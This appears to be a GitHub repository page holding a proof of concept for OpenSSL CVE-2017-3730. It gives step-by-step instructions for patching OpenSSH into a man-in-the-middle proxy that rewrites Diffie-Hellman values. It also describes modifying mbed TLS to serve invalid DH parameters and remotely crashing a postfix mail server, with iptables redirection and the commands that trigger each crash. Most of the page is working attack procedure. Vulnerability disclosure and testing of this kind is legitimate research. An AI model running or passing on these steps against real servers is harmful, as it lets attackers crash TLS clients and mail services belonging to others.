Skip to content
OpenSSL CVE-2017-3730 proof-of-concept
Branch: master
Clone or download
Latest commit 98cca4c Jan 26, 2017
Type Name Latest commit message Commit time
Failed to load latest commit information.
openssh-7.4p1-mitm-patch.txt Add OpenSSH MITM patch Jan 22, 2017


OpenSSL CVE-2017-3730 proof-of-concept

Using OpenSSH as a proxy to patch DH values on the fly

  • Create an SSL server using a ciphersuite like DHE-PSK-WITH-AES-256-GCM-SHA384. Let's say it runs on port 8899
  • Get openssh-7.4p1
  • Apply patch
  • Build it
  • Run it like:
./ssh -vvv -N -D 1085 -o TCPKeepAlive=yes -o ServerAliveInterval=60 localhost
  • In a different terminal create a file ~/.tsocks.conf with this content:
server =
server_port = 1085
server_type = 5
local =
  • ```export TSOCKS_CONF_FILE=`realpath ~/.tsocks.conf````
  • tsocks
  • This creates a shell in which all network traffic flows through our "evil" proxy
  • openssl s_client -connect -psk AA
  • crash

Modify mbed TLS to serve invalid DH parameter

Crashing postfix remotely

  • Compile postfix with OpenSSL 1.1.0
  • Compile crash-postfix.c against the PATCHED mbed TLS (see above)
  • What I did was run postfix in a VM and run crash-postfix on the host:
  • iptables -t nat -A OUTPUT -p tcp --dport 25 -j DNAT --to-destination
  • Start crash-postfix
  • Run postfix: posttls-finger
  • Crash
You can’t perform that action at this time.